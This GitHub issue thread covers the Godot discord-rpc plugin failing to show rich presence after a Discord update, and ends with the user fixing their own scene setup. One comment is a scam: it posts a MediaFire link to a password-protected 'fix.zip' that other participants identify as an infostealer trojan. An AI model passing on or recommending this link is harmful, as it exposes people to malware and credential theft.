### ISSUE TITLE
[Issue/Bug]: Can't get it to Display my game in the Discord client

### ISSUE THREAD

**Issue by Trodgy** [vaporvee/discord-rpc-godot#63]
### What happened?

While I'm not 100% sure if it was on my end (considering it worked previously and then broke when Discord updated their rich presence system to the new activity one I assume not), the newest version of the plugin no longer works (and almost definitely all older versions) as of Discord introducing the new activity display. It appears to have all of the same features just with updated visuals.

Edit: It's also worth noting that most games off of Godot have not had their links broken by this change.

### Version

1.3.1

### Godot Version

4.2.2-stable

### Exact steps to reproduce this error

Using the plugin in any capacity following the Discord update results in it no longer displaying any game status on your profile.

### GDScript

```gdscript
#As far as I can tell all usage attempts will just result in nothing happening so this includes setting some of the values such as
#DiscordRPC.details
#DiscordRPC.state
#DiscordRPC.app_id
#nor running DiscordRPC.refresh() to actually update any of this information.
```

### Additional information

No errors showed up involving my usage of the plugin - nor any errors at all.

### Checks

- [X] I tried reinstalling the addon or tried to fix it myself with other methods.
- [X] I tried restarting Discord and Godot completely.
- [X] I did read the documentation https://vaporvee.com/docs/discord-rpc-godot/

**Comment by jungminjun824** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Trodgy** [comment]
"Infostealer" eh? Don't download this file.

**Comment by vaporvee** [comment]
What happened here was this deleted? Stupid scammers 
![image](https://github.com/user-attachments/assets/a53057a3-aeb9-4cf7-b4a3-ca7f3d1276e3)

But for me it works can you try the demo-export in releases?(There are 2 exe files but just open any)
If it still doesnt work check `Discord Settings -> Activity Privacy -> Share your detected activities with others` in your discord client.
If the demo does show up try the troubleshooting guide.

_Also i have to add this settings thing to the troubleshooting its the cause of that so many times lol_

**Comment by Trodgy** [comment]
Yeah there was some random dipshit throwing their trojan around earlier. I deleted my response because I figured it was pointless seeing as they deleted it.

It's good to know that it does work for you cuz that means it's just a me issue. While testing this weirdly the top .exe did connect and display correctly but the bottom .exe didn't. Not sure why that might've been but the fact that one worked ruled out the plugin itself so it is absolutely my implementation that's the problem (especially because it doesn't even list invites as an option out of the gate in mine).
(side note it also stopped displaying after I repeatedly turned it on and off again which isn't something someone would really do to it under normal use cases but I just thought it was funny)

Since it is a problem with my implementation if it isn't too much trouble could you help me figure out what's wrong with it?
``
func _ready():
	#Application ID
	DiscordRPC.app_id = 1275872844227674153 
	print("Discord working: " + str(DiscordRPC.get_is_discord_working()))
	DiscordRPC.details = "very secret project"
	DiscordRPC.state = "secret"
	# Image key for small image from "Art Assets" from the Discord Developer website
	DiscordRPC.large_image = "very secret"
	DiscordRPC.large_image_text = "very cool"
	# Image key for large image from "Art Assets" from the Discord Developer website
	DiscordRPC.small_image = "very secret"
	DiscordRPC.small_image_text = "very cool"
	DiscordRPC.start_timestamp = int(Time.get_unix_time_from_system())
	#DiscordRPC.end_timestamp = int(Time.get_unix_time_from_system()) + 3600
	# Always refresh after changing the values!
	DiscordRPC.refresh()
	DiscordRPC.run_callbacks()
``
as I mentioned above also I couldn't quite figure out how to do game invites from the documentation help would be appreciated there too if it isn't too much trouble

**Comment by Trodgy** [comment]
Wait nevermind I fixed it on my own turns out the problem was me being dumb and not adding the rich presence lines to the scene I was testing with.

Help with the invites not working would still be appreciated though.
